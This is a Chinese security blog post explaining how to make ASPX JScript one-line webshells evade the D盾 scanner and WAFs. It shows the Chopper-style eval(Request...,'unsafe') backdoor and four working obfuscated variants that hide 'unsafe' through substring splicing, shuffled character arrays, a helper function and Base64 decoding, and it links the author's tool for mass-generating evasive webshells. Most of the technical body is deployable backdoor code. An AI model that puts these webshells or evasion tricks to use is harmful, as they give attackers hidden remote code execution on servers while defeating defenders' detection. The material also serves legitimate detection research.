yzddMr6's Blog

信息安全


  • 首页

  • 分类

  • 标签

  • 归档

  • 知识星球

  • 关于

  • 搜索

无限免杀D盾脚本之aspx

发表于 2019-08-11 更新于 2019-09-16 分类于 技术文章 阅读次数:
1
2019-7-15 自己发在土司的文章

前言

自己曾经写过一篇文章:利用随机异或无限免杀某盾

php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.

因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀

0x01 主要方法

1
2
3
4
字符串拼接
函数
数组
Base64编码

0x02 了解aspx一句话

Aspx的一句话一般是使用Jscript语言实现

看看原本的菜刀aspx一句话

1
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

其实与php的类似
Eval函数将字符串当做代码执行
不同的是在Jscript中为了安全起见必须使用unsafe参数,才可以使其具有对操作系统操作的功能

Request.Item[“pass”] 的pass就是接受的参数 类似于php的$_POST[“pass”]

Jscript基本用法

1
Function xxx(){}//声明一个函数

字符串拼接

1
2
Var a =’a’+’b’;//a=’ab’;
Var a= ‘\x61’; //a=’a’;

数组声明

1
2
Var a=’abc’;
Var b=a(0);//b=’a’;

作为免杀来说一般waf杀的都是unsafe这个参数,所以我们的免杀也将从这个参数下手

0x02 字符串拼接

经过测试,一般来说把’unsafe’这个字符串无论是十六进制拼接还是直接大小写拼接均不可行
于是想到可以采用substr函数

1
2
3
4
5
6
7
8
<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
var b='aaaunsaaaafe';
var b=b.substr(3,4)+b.substr(10);
eval(a,b);

%>

0x03 数组

感觉大多数waf对数组拼接并不感冒,就可以打乱顺序,利用数组进行拼接

1
2
3
4
5
6
7
<%@ Page Language="Jscript" Debug=true%>
<%
var a='efasnu';
var b=Request.Form("mr6");
var c=a(5)+a(4)+a(3)+a(2)+a(1)+a(0);
eval(b,c);
%>

0x04 函数

因为某盾对字符串拼接杀得比较厉害,放在函数里当做返回值即可

1
2
3
4
5
6
7
8
9
10
11
12
<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
function ok()
{
var c="un";
var b="safe";
return c+b;
}
eval(a,ok());

%>

0x05 BASE64编码

Php中经常使用base64编码来bypass,那么在aspx中如何实现呢

1
var res=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(‘eXpkZG1yNg==’);//res=’yzddmr6’;

那么我们对于unsafe这个特征就可以使用base64编码来绕过

1
2
3
4
5
6
7
<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
var res=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String('dW5zYWZl'));
eval(a,res);

%>

0x06 总结

可能是因为aspx的免杀现在还不是很多,所以waf的查杀并不是很严格,不需要太复杂就可以绕过.
对于以上方法还可以连环套用,以达到混淆的效果

自己写了个脚本,利用以上方法来无限生成免杀aspx的webshell

已经放到了自己的项目webshell_venom中

项目地址:
https://github.com/yzddmr6/webshell-venom

本文标题:无限免杀D盾脚本之aspx

文章作者:yzddMr6

发布时间:2019年08月11日 - 22:27

最后更新:2019年09月16日 - 23:21

原始链接:https://yzddmr6.tk/posts/webshell-venom-aspx/

许可协议: 转载请保留原文链接及作者。

你的支持将是我更新的动力!
yzddMr6 微信支付

微信支付

# 免杀 # webshell-venom
利用随机异或无限免杀d盾 2.0
一键吊打D盾(免杀一句话无限生成)
  • 文章目录
  • 站点概览
yzddMr6

yzddMr6

慢就是快,少就是多。
48 日志
3 分类
15 标签
RSS
GitHub E-Mail 简书
友情链接
  • NaiveKun
  • Fi9coder
  • Sardinefish
  • Panda
  • 卿先生
  • 九世
  • LFY
  1. 1. 前言
  2. 2. 0x01 主要方法
  3. 3. 0x02 了解aspx一句话
    1. 3.1. Jscript基本用法
    2. 3.2. 字符串拼接
    3. 3.3. 数组声明
  4. 4. 0x02 字符串拼接
  5. 5. 0x03 数组
  6. 6. 0x04 函数
  7. 7. 0x05 BASE64编码
  8. 8. 0x06 总结
© 2021 yzddMr6
|